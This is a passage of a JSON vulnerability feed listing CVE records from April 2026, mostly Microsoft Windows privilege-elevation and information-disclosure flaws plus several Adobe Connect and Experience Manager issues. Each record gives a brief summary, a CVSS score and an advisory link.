locally.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32091"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32093","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32093"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32149","summary":"Improper input validation in Windows Hyper-V allows an authorized attacker to execute code locally.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32149"],"published_time":"2026-04-14T18:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32088","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Biometric Service allows an unauthorized attacker to bypass a security feature with a physical attack.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32088"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32089","summary":"Use after free in Windows Speech Brokered Api allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32089"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32090","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Speech Brokered Api allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32090"],"published_time":"2026-04-14T18:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32085","summary":"Exposure of sensitive information to an unauthorized actor in Windows Remote Procedure Call allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32085"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32086","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32086"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32087","summary":"Heap-based buffer overflow in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32087"],"published_time":"2026-04-14T18:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32082","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32082"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32083","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32083"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32084","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32084"],"published_time":"2026-04-14T18:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32078","summary":"Use after free in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32078"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32079","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32079"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32080","summary":"Use after free in Windows WalletService allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32080"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32081","summary":"Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32081"],"published_time":"2026-04-14T18:17:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32076","summary":"Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32076"],"published_time":"2026-04-14T18:17:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32077","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32077"],"published_time":"2026-04-14T18:17:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32073","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32073"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32074","summary":"Double free in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32074"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32075","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32075"],"published_time":"2026-04-14T18:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32070","summary":"Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32070"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32071","summary":"Null pointer dereference in Windows Local Security Authority Subsystem Service (LSASS) allows an unauthorized attacker to deny service over a network.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32071"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32072","summary":"Improper authentication in Windows Active Directory allows an unauthorized attacker to perform spoofing locally.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32072"],"published_time":"2026-04-14T18:17:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27931","summary":"Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27931"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32068","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SSDP Service allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32068"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32069","summary":"Double free in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32069"],"published_time":"2026-04-14T18:17:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27928","summary":"Improper input validation in Windows Hello allows an unauthorized attacker to bypass a security feature over a network.","cvss":8.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27928"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27929","summary":"Time-of-check time-of-use (toctou) race condition in Windows LUAFV allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27929"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27930","summary":"Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27930"],"published_time":"2026-04-14T18:17:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27924","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27924"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27925","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an unauthorized attacker to disclose information over an adjacent network.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27925"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27926","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27926"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27927","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27927"],"published_time":"2026-04-14T18:17:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27922","summary":"Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27922"],"published_time":"2026-04-14T18:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27923","summary":"Use after free in Desktop Window Manager allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27923"],"published_time":"2026-04-14T18:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27919","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27919"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27920","summary":"Untrusted pointer dereference in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27920"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27921","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27921"],"published_time":"2026-04-14T18:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27917","summary":"Use after free in Windows WFP NDIS Lightweight Filter Driver (wfplwfs.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27917"],"published_time":"2026-04-14T18:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27918","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27918"],"published_time":"2026-04-14T18:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27914","summary":"Improper access control in Microsoft Management Console allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27914"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27915","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27915"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27916","summary":"Use after free in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27916"],"published_time":"2026-04-14T18:16:59","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27911","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows User Interface Core allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27911"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27912","summary":"Improper authorization in Windows Kerberos allows an authorized attacker to elevate privileges over an adjacent network.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27912"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27913","summary":"Improper input validation in Windows BitLocker allows an unauthorized attacker to bypass a security feature locally.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27913"],"published_time":"2026-04-14T18:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27907","summary":"Integer underflow (wrap or wraparound) in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27907"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27908","summary":"Use after free in Windows TDI Translation Driver (tdx.sys) allows an authorized attacker to elevate privileges locally.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27908"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27909","summary":"Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27909"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27910","summary":"Improper handling of insufficient permissions or privileges in Windows Installer allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27910"],"published_time":"2026-04-14T18:16:57","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27246","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27258","summary":"DNG SDK versions 1.7.1 2502 and earlier are affected by an out-of-bounds write vulnerability that could lead to application denial-of-service. An attacker could leverage this vulnerability to corrupt memory, causing the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/dng-sdk/apsb26-41.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27288","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27303","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27906","summary":"Improper input validation in Windows Hello allows an authorized attacker to bypass a security feature locally.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27906"],"published_time":"2026-04-14T18:16:56","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26183","summary":"Improper access control in Windows RPC API allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26183"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26184","summary":"Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26184"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27243","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27245","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:16:55","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26179","summary":"Double free in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26179"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26180","summary":"Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26180"],"published_time":"2026-04-14T18:16:54","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26181","summary":"Use after free in Microsoft Brokering File System allows an authorized attacker to elevate privileges 